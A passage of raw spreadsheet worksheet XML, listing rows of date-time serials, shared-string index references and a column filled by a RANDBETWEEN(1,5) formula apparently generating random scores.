    <row r="23797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23797" s="1">
        <v>43007.275578703702</v>
      </c>
      <c r="C23797" t="s">
        <v>60</v>
      </c>
      <c r="E23797" t="s">
        <v>21540</v>
      </c>
      <c r="F23797">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23798" s="1">
        <v>43007.266122685185</v>
      </c>
      <c r="C23798" t="s">
        <v>71</v>
      </c>
      <c r="E23798" t="s">
        <v>21541</v>
      </c>
      <c r="F23798">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23799" s="1">
        <v>43007.196527777778</v>
      </c>
      <c r="C23799" t="s">
        <v>73</v>
      </c>
      <c r="E23799" t="s">
        <v>21542</v>
      </c>
      <c r="F23799">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23800" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A23800" s="1">
        <v>43007.191192129627</v>
      </c>
      <c r="C23800" t="s">
        <v>314</v>
      </c>
      <c r="E23800" s="2" t="s">
        <v>21543</v>
      </c>
      <c r="F23800">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23801" s="1">
        <v>43007.126145833332</v>
      </c>
      <c r="C23801" t="s">
        <v>71</v>
      </c>
      <c r="E23801" t="s">
        <v>21544</v>
      </c>
      <c r="F23801">
        <f t="shared" ca="1" si="371"/>
        <v>5</v>
      </c>
    </row>
    <row r="23802" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23802" s="1">
        <v>43007.115335648145</v>
      </c>
      <c r="C23802" t="s">
        <v>253</v>
      </c>
      <c r="E23802" s="2" t="s">
        <v>21545</v>
      </c>
      <c r="F23802">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23803" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23803" s="1">
        <v>43007.081423611111</v>
      </c>
      <c r="C23803" t="s">
        <v>229</v>
      </c>
      <c r="E23803" t="s">
        <v>21546</v>
      </c>
      <c r="F23803">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23804" s="1">
        <v>43006.936249999999</v>
      </c>
      <c r="C23804" t="s">
        <v>10</v>
      </c>
      <c r="D23804" t="s">
        <v>6</v>
      </c>
      <c r="E23804" t="s">
        <v>21547</v>
      </c>
      <c r="F23804">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23805" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A23805" s="1">
        <v>43006.762453703705</v>
      </c>
      <c r="C23805" t="s">
        <v>10</v>
      </c>
      <c r="D23805" t="s">
        <v>20</v>
      </c>
      <c r="E23805" s="2" t="s">
        <v>21548</v>
      </c>
      <c r="F23805">
        <f t="shared" ca="1" si="371"/>
        <v>3</v>
      </c>
    </row>
    <row r="23806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23806" s="1">
        <v>43006.762326388889</v>
      </c>
      <c r="C23806" t="s">
        <v>10</v>
      </c>
      <c r="D23806" t="s">
        <v>36</v>
      </c>
      <c r="E23806" t="s">
        <v>21549</v>
      </c>
      <c r="F23806">
        <f t="shared" ca="1" si="371"/>
        <v>2</v>
      </c>
    </row>
    <row r="23807" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23807" s="1">
        <v>43006.733344907407</v>
      </c>
      <c r="C23807" t="s">
        <v>10</v>
      </c>
      <c r="D23807" t="s">
        <v>6</v>
      </c>
      <c r="E23807" t="s">
        <v>21550</v>
      </c>
      <c r="F23807">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23808" s="1">
        <v>43006.729409722226</v>
      </c>
      <c r="C23808" t="s">
        <v>6</v>
      </c>
      <c r="D23808" t="s">
        <v>114</v>
      </c>
      <c r="E23808" t="s">
        <v>21551</v>
      </c>
      <c r="F23808">
        <f t="shared" ca="1" si="371"/>
        <v>4</v>
      </c>
    </row>
    <row r="23809" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23809" s="1">
        <v>43006.726145833331</v>
      </c>
      <c r="C23809" t="s">
        <v>10</v>
      </c>
      <c r="D23809" t="s">
        <v>23</v>
      </c>
      <c r="E23809" t="s">
        <v>21552</v>
      </c>
      <c r="F23809">
        <f t="shared" ca="1" si="371"/>
        <v>1</v>
      </c>
    </row>
    <row r="23810" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23810" s="1">
        <v>43006.726134259261</v>
      </c>
      <c r="C23810" t="s">
        <v>10</v>
      </c>
      <c r="D23810" t="s">
        <v>23</v>
      </c>
      <c r="E23810" t="s">
        <v>21552</v>
      </c>
      <c r="F23810">
        <f t="shared" ref="F23810:F23873" ca="1" si="372">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="23811" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A23811" s="1">
        <v>43006.674004629633</v>
      </c>
      <c r="C23811" t="s">
        <v>10</v>
      </c>
      <c r="D23811" t="s">
        <v>271</v>
      </c>
      <c r="E23811" s="2" t="s">
        <v>21553</v>
      </c>
      <c r="F23811">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23812" s="1">
        <v>43006.65828703704</v>
      </c>
      <c r="C23812" t="s">
        <v>10</v>
      </c>
      <c r="D23812" t="s">
        <v>52</v>
      </c>
      <c r="E23812" t="s">
        <v>21554</v>
      </c>
      <c r="F23812">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23813" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A23813" s="1">
        <v>43006.628935185188</v>
      </c>
      <c r="C23813" t="s">
        <v>10</v>
      </c>
      <c r="D23813" t="s">
        <v>11</v>
      </c>
      <c r="E23813" s="2" t="s">
        <v>21555</v>
      </c>
      <c r="F23813">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23814" s="1">
        <v>43006.625555555554</v>
      </c>
      <c r="C23814" t="s">
        <v>10</v>
      </c>
      <c r="D23814" t="s">
        <v>6</v>
      </c>
      <c r="E23814" t="s">
        <v>21556</v>
      </c>
      <c r="F23814">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23815" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23815" s="1">
        <v>43006.617222222223</v>
      </c>
      <c r="C23815" t="s">
        <v>6</v>
      </c>
      <c r="D23815" t="s">
        <v>25</v>
      </c>
      <c r="E23815" s="2" t="s">
        <v>21557</v>
      </c>
      <c r="F23815">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23816" s="1">
        <v>43006.611435185187</v>
      </c>
      <c r="C23816" t="s">
        <v>60</v>
      </c>
      <c r="E23816" t="s">
        <v>21558</v>
      </c>
      <c r="F23816">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23817" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23817" s="1">
        <v>43006.586504629631</v>
      </c>
      <c r="C23817" t="s">
        <v>6</v>
      </c>
      <c r="D23817" t="s">
        <v>114</v>
      </c>
      <c r="E23817" t="s">
        <v>21559</v>
      </c>
      <c r="F23817">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23818" s="1">
        <v>43006.568761574075</v>
      </c>
      <c r="C23818" t="s">
        <v>10</v>
      </c>
      <c r="D23818" t="s">
        <v>52</v>
      </c>
      <c r="E23818" t="s">
        <v>21560</v>
      </c>
      <c r="F23818">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23819" s="1">
        <v>43006.56454861111</v>
      </c>
      <c r="C23819" t="s">
        <v>16</v>
      </c>
      <c r="E23819" t="s">
        <v>21561</v>
      </c>
      <c r="F23819">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23820" s="1">
        <v>43006.563807870371</v>
      </c>
      <c r="C23820" t="s">
        <v>10</v>
      </c>
      <c r="D23820" t="s">
        <v>6</v>
      </c>
      <c r="E23820" t="s">
        <v>21562</v>
      </c>
      <c r="F23820">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23821" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A23821" s="1">
        <v>43006.553888888891</v>
      </c>
      <c r="C23821" t="s">
        <v>10</v>
      </c>
      <c r="D23821" t="s">
        <v>89</v>
      </c>
      <c r="E23821" s="2" t="s">
        <v>21563</v>
      </c>
      <c r="F23821">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23822" s="1">
        <v>43006.521631944444</v>
      </c>
      <c r="C23822" t="s">
        <v>6</v>
      </c>
      <c r="D23822" t="s">
        <v>25</v>
      </c>
      <c r="E23822" t="s">
        <v>21564</v>
      </c>
      <c r="F23822">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23823" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23823" s="1">
        <v>43006.4996875</v>
      </c>
      <c r="C23823" t="s">
        <v>10</v>
      </c>
      <c r="D23823" t="s">
        <v>89</v>
      </c>
      <c r="E23823" s="2" t="s">
        <v>21565</v>
      </c>
      <c r="F23823">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23824" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23824" s="1">
        <v>43006.455335648148</v>
      </c>
      <c r="C23824" t="s">
        <v>10</v>
      </c>
      <c r="D23824" t="s">
        <v>20</v>
      </c>
      <c r="E23824" t="s">
        <v>21566</v>
      </c>
      <c r="F23824">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23825" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23825" s="1">
        <v>43006.443599537037</v>
      </c>
      <c r="C23825" t="s">
        <v>10</v>
      </c>
      <c r="D23825" t="s">
        <v>6</v>
      </c>
      <c r="E23825" s="2" t="s">
        <v>21567</v>
      </c>
      <c r="F23825">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23826" s="1">
        <v>43006.422025462962</v>
      </c>
      <c r="C23826" t="s">
        <v>6</v>
      </c>
      <c r="E23826" t="s">
        <v>21568</v>
      </c>
      <c r="F23826">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23827" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A23827" s="1">
        <v>43006.411597222221</v>
      </c>
      <c r="C23827" t="s">
        <v>134</v>
      </c>
      <c r="E23827" s="2" t="s">
        <v>21569</v>
      </c>
      <c r="F23827">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23828" s="1">
        <v>43006.405648148146</v>
      </c>
      <c r="C23828" t="s">
        <v>10</v>
      </c>
      <c r="D23828" t="s">
        <v>271</v>
      </c>
      <c r="F23828">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23829" s="1">
        <v>43006.386053240742</v>
      </c>
      <c r="C23829" t="s">
        <v>10</v>
      </c>
      <c r="D23829" t="s">
        <v>41</v>
      </c>
      <c r="E23829" t="s">
        <v>21570</v>
      </c>
      <c r="F23829">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23830" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23830" s="1">
        <v>43006.379525462966</v>
      </c>
      <c r="C23830" t="s">
        <v>65</v>
      </c>
      <c r="E23830" s="2" t="s">
        <v>21571</v>
      </c>
      <c r="F23830">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23831" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23831" s="1">
        <v>43006.357800925929</v>
      </c>
      <c r="C23831" t="s">
        <v>189</v>
      </c>
      <c r="E23831" s="2" t="s">
        <v>21572</v>
      </c>
      <c r="F23831">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23832" s="1">
        <v>43006.303055555552</v>
      </c>
      <c r="C23832" t="s">
        <v>48</v>
      </c>
      <c r="E23832" t="s">
        <v>21573</v>
      </c>
      <c r="F23832">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23833" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A23833" s="1">
        <v>43006.293310185189</v>
      </c>
      <c r="C23833" t="s">
        <v>461</v>
      </c>
      <c r="E23833" s="2" t="s">
        <v>21574</v>
      </c>
      <c r="F23833">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23834" s="1">
        <v>43006.287511574075</v>
      </c>
      <c r="C23834" t="s">
        <v>10</v>
      </c>
      <c r="D23834" t="s">
        <v>112</v>
      </c>
      <c r="E23834" t="s">
        <v>21575</v>
      </c>
      <c r="F23834">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23835" s="1">
        <v>43006.260659722226</v>
      </c>
      <c r="C23835" t="s">
        <v>5233</v>
      </c>
      <c r="E23835" t="s">
        <v>21576</v>
      </c>
      <c r="F23835">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23836" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23836" s="1">
        <v>43006.231249999997</v>
      </c>
      <c r="C23836" t="s">
        <v>48</v>
      </c>
      <c r="E23836" s="2" t="s">
        <v>21577</v>
      </c>
      <c r="F23836">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23837" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A23837" s="1">
        <v>43006.229375000003</v>
      </c>
      <c r="C23837" t="s">
        <v>41</v>
      </c>
      <c r="E23837" s="2" t="s">
        <v>21578</v>
      </c>
      <c r="F23837">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23838" s="1">
        <v>43006.229247685187</v>
      </c>
      <c r="C23838" t="s">
        <v>48</v>
      </c>
      <c r="E23838" t="s">
        <v>21579</v>
      </c>
      <c r="F23838">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23839" s="1">
        <v>43006.159745370373</v>
      </c>
      <c r="C23839" t="s">
        <v>8872</v>
      </c>
      <c r="E23839" t="s">
        <v>21580</v>
      </c>
      <c r="F23839">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23840" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23840" s="1">
        <v>43006.112743055557</v>
      </c>
      <c r="C23840" t="s">
        <v>71</v>
      </c>
      <c r="E23840" s="2" t="s">
        <v>21581</v>
      </c>
      <c r="F23840">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23841" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A23841" s="1">
        <v>43006.081493055557</v>
      </c>
      <c r="C23841" t="s">
        <v>189</v>
      </c>
      <c r="E23841" s="2" t="s">
        <v>21582</v>
      </c>
      <c r="F23841">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23842" s="1">
        <v>43006.079965277779</v>
      </c>
      <c r="C23842" t="s">
        <v>318</v>
      </c>
      <c r="E23842" t="s">
        <v>21583</v>
      </c>
      <c r="F23842">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23843" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23843" s="1">
        <v>43006.07135416667</v>
      </c>
      <c r="C23843" t="s">
        <v>318</v>
      </c>
      <c r="E23843" s="2" t="s">
        <v>21584</v>
      </c>
      <c r="F23843">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23844" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23844" s="1">
        <v>43006.016076388885</v>
      </c>
      <c r="C23844" t="s">
        <v>73</v>
      </c>
      <c r="E23844" s="2" t="s">
        <v>21585</v>
      </c>
      <c r="F23844">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23845" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23845" s="1">
        <v>43005.952233796299</v>
      </c>
      <c r="C23845" t="s">
        <v>229</v>
      </c>
      <c r="E23845" s="2" t="s">
        <v>21586</v>
      </c>
      <c r="F23845">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23846" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A23846" s="1">
        <v>43005.905740740738</v>
      </c>
      <c r="C23846" t="s">
        <v>140</v>
      </c>
      <c r="D23846" t="s">
        <v>234</v>
      </c>
      <c r="E23846" s="2" t="s">
        <v>21587</v>
      </c>
      <c r="F23846">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23847" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A23847" s="1">
        <v>43005.893692129626</v>
      </c>
      <c r="C23847" t="s">
        <v>845</v>
      </c>
      <c r="E23847" s="2" t="s">
        <v>21588</v>
      </c>
      <c r="F23847">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23848" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A23848" s="1">
        <v>43005.868657407409</v>
      </c>
      <c r="C23848" t="s">
        <v>712</v>
      </c>
      <c r="D23848" t="s">
        <v>312</v>
      </c>
      <c r="E23848" s="2" t="s">
        <v>21589</v>
      </c>
      <c r="F23848">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23849" s="1">
        <v>43005.780856481484</v>
      </c>
      <c r="C23849" t="s">
        <v>6</v>
      </c>
      <c r="D23849" t="s">
        <v>25</v>
      </c>
      <c r="E23849" t="s">
        <v>21590</v>
      </c>
      <c r="F23849">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23850" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A23850" s="1">
        <v>43005.772152777776</v>
      </c>
      <c r="C23850" t="s">
        <v>10</v>
      </c>
      <c r="D23850" t="s">
        <v>192</v>
      </c>
      <c r="E23850" s="2" t="s">
        <v>21591</v>
      </c>
      <c r="F23850">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23851" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23851" s="1">
        <v>43005.741493055553</v>
      </c>
      <c r="C23851" t="s">
        <v>10</v>
      </c>
      <c r="D23851" t="s">
        <v>178</v>
      </c>
      <c r="E23851" t="s">
        <v>21592</v>
      </c>
      <c r="F23851">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23852" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A23852" s="1">
        <v>43005.741469907407</v>
      </c>
      <c r="C23852" t="s">
        <v>10</v>
      </c>
      <c r="D23852" t="s">
        <v>80</v>
      </c>
      <c r="E23852" s="2" t="s">
        <v>21593</v>
      </c>
      <c r="F23852">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23853" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23853" s="1">
        <v>43005.715219907404</v>
      </c>
      <c r="C23853" t="s">
        <v>10</v>
      </c>
      <c r="D23853" t="s">
        <v>336</v>
      </c>
      <c r="E23853" s="2" t="s">
        <v>21594</v>
      </c>
      <c r="F23853">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23854" s="1">
        <v>43005.706817129627</v>
      </c>
      <c r="C23854" t="s">
        <v>10</v>
      </c>
      <c r="D23854" t="s">
        <v>80</v>
      </c>
      <c r="E23854" t="s">
        <v>32</v>
      </c>
      <c r="F23854">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23855" s="1">
        <v>43005.677974537037</v>
      </c>
      <c r="C23855" t="s">
        <v>10</v>
      </c>
      <c r="D23855" t="s">
        <v>6</v>
      </c>
      <c r="E23855" t="s">
        <v>21595</v>
      </c>
      <c r="F23855">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23856" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23856" s="1">
        <v>43005.652638888889</v>
      </c>
      <c r="C23856" t="s">
        <v>10</v>
      </c>
      <c r="D23856" t="s">
        <v>151</v>
      </c>
      <c r="E23856" t="s">
        <v>21596</v>
      </c>
      <c r="F23856">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23857" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A23857" s="1">
        <v>43005.615810185183</v>
      </c>
      <c r="C23857" t="s">
        <v>10</v>
      </c>
      <c r="D23857" t="s">
        <v>107</v>
      </c>
      <c r="E23857" s="2" t="s">
        <v>21597</v>
      </c>
      <c r="F23857">
        <f t="shared" ca="1" si="372"/>
        <v>1</v>
      </c>
    </row>
    <row r="23858" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23858" s="1">
        <v>43005.57980324074</v>
      </c>
      <c r="C23858" t="s">
        <v>10</v>
      </c>
      <c r="D23858" t="s">
        <v>192</v>
      </c>
      <c r="E23858" t="s">
        <v>21598</v>
      </c>
      <c r="F23858">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23859" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A23859" s="1">
        <v>43005.575775462959</v>
      </c>
      <c r="C23859" t="s">
        <v>41</v>
      </c>
      <c r="E23859" s="2" t="s">
        <v>21599</v>
      </c>
      <c r="F23859">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23860" s="1">
        <v>43005.564409722225</v>
      </c>
      <c r="C23860" t="s">
        <v>10</v>
      </c>
      <c r="D23860" t="s">
        <v>6</v>
      </c>
      <c r="E23860" t="s">
        <v>21600</v>
      </c>
      <c r="F23860">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23861" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23861" s="1">
        <v>43005.560289351852</v>
      </c>
      <c r="C23861" t="s">
        <v>10</v>
      </c>
      <c r="D23861" t="s">
        <v>89</v>
      </c>
      <c r="E23861" t="s">
        <v>21601</v>
      </c>
      <c r="F23861">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23862" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23862" s="1">
        <v>43005.543877314813</v>
      </c>
      <c r="C23862" t="s">
        <v>10</v>
      </c>
      <c r="D23862" t="s">
        <v>89</v>
      </c>
      <c r="E23862" t="s">
        <v>21602</v>
      </c>
      <c r="F23862">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23863" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23863" s="1">
        <v>43005.539421296293</v>
      </c>
      <c r="C23863" t="s">
        <v>82</v>
      </c>
      <c r="E23863" s="2" t="s">
        <v>21603</v>
      </c>
      <c r="F23863">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23864" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A23864" s="1">
        <v>43005.539305555554</v>
      </c>
      <c r="C23864" t="s">
        <v>82</v>
      </c>
      <c r="E23864" s="2" t="s">
        <v>21603</v>
      </c>
      <c r="F23864">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23865" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A23865" s="1">
        <v>43005.52784722222</v>
      </c>
      <c r="C23865" t="s">
        <v>10</v>
      </c>
      <c r="D23865" t="s">
        <v>381</v>
      </c>
      <c r="E23865" s="2" t="s">
        <v>21604</v>
      </c>
      <c r="F23865">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23866" s="1">
        <v>43005.524074074077</v>
      </c>
      <c r="C23866" t="s">
        <v>10</v>
      </c>
      <c r="D23866" t="s">
        <v>6</v>
      </c>
      <c r="E23866" t="s">
        <v>21605</v>
      </c>
      <c r="F23866">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23867" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A23867" s="1">
        <v>43005.493923611109</v>
      </c>
      <c r="C23867" t="s">
        <v>65</v>
      </c>
      <c r="E23867" s="2" t="s">
        <v>21606</v>
      </c>
      <c r="F23867">
        <f t="shared" ca="1" si="372"/>
        <v>3</v>
      </c>
    </row>
    <row r="23868" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23868" s="1">
        <v>43005.487430555557</v>
      </c>
      <c r="C23868" t="s">
        <v>10</v>
      </c>
      <c r="D23868" t="s">
        <v>178</v>
      </c>
      <c r="E23868" t="s">
        <v>21607</v>
      </c>
      <c r="F23868">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23869" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A23869" s="1">
        <v>43005.483865740738</v>
      </c>
      <c r="C23869" t="s">
        <v>10</v>
      </c>
      <c r="D23869" t="s">
        <v>52</v>
      </c>
      <c r="E23869" s="2" t="s">
        <v>21608</v>
      </c>
      <c r="F23869">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23870" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23870" s="1">
        <v>43005.476574074077</v>
      </c>
      <c r="C23870" t="s">
        <v>10</v>
      </c>
      <c r="D23870" t="s">
        <v>89</v>
      </c>
      <c r="E23870" t="s">
        <v>21609</v>
      </c>
      <c r="F23870">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23871" s="1">
        <v>43005.450057870374</v>
      </c>
      <c r="C23871" t="s">
        <v>6</v>
      </c>
      <c r="D23871" t="s">
        <v>25</v>
      </c>
      <c r="E23871" t="s">
        <v>1846</v>
      </c>
      <c r="F23871">
        <f t="shared" ca="1" si="372"/>
        <v>2</v>
      </c>
    </row>
    <row r="23872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23872" s="1">
        <v>43005.447858796295</v>
      </c>
      <c r="C23872" t="s">
        <v>10</v>
      </c>
      <c r="D23872" t="s">
        <v>80</v>
      </c>
      <c r="E23872" t="s">
        <v>21610</v>
      </c>
      <c r="F23872">
        <f t="shared" ca="1" si="372"/>
        <v>5</v>
      </c>
    </row>
    <row r="23873" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23873" s="1">
        <v>43005.446446759262</v>
      </c>
      <c r="C23873" t="s">
        <v>10</v>
      </c>
      <c r="D23873" t="s">
        <v>80</v>
      </c>
      <c r="E23873" t="s">
        <v>21611</v>
      </c>
      <c r="F23873">
        <f t="shared" ca="1" si="372"/>
        <v>4</v>
      </c>
    </row>
    <row r="23874" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23874" s="1">
        <v>43005.42082175926</v>
      </c>
      <c r="C23874" t="s">
        <v>29</v>
      </c>
      <c r="F23874">
        <f t="shared" ref="F23874:F23937" ca="1" si="373">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="23875" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A23875" s="1">
        <v>43005.382604166669</v>
      </c>
      <c r="C23875" t="s">
